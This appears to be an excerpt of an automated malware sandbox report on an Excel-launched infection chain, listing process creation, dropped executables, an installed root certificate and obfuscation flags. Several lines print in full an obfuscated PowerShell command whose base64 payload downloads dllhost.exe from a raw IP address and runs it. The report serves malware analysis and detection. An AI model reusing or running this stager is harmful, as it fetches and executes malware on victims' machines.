Source: C:\Windows\System32\mshta.exe Process created: "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
Source: C:\Windows\System32\mshta.exe Process created: "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
Source: C:\Windows\System32\mshta.exe Process created: "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))" Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))" Jump to behavior
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.cmdline"
PE file contains an invalid checksum
Source: ngxpd0hb.dll.8.dr Static PE information: real checksum: 0x0 should be: 0x1769
Source: tnesdt30.dll.18.dr Static PE information: real checksum: 0x0 should be: 0xa26d
Source: dllhost.exe.7.dr Static PE information: real checksum: 0xa2135 should be: 0xff670
Source: dllhost[1].exe.7.dr Static PE information: real checksum: 0xa2135 should be: 0xff670
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_000007FE899A022D push eax; iretd 7_2_000007FE899A0241
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_000007FE899A00BD pushad ; iretd 7_2_000007FE899A00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_000007FE899A2243 pushad ; ret 7_2_000007FE899A2261

Persistence and Installation Behavior
barindex
Installs new ROOT certificates
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\dllhost.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.dll Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dllhost[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
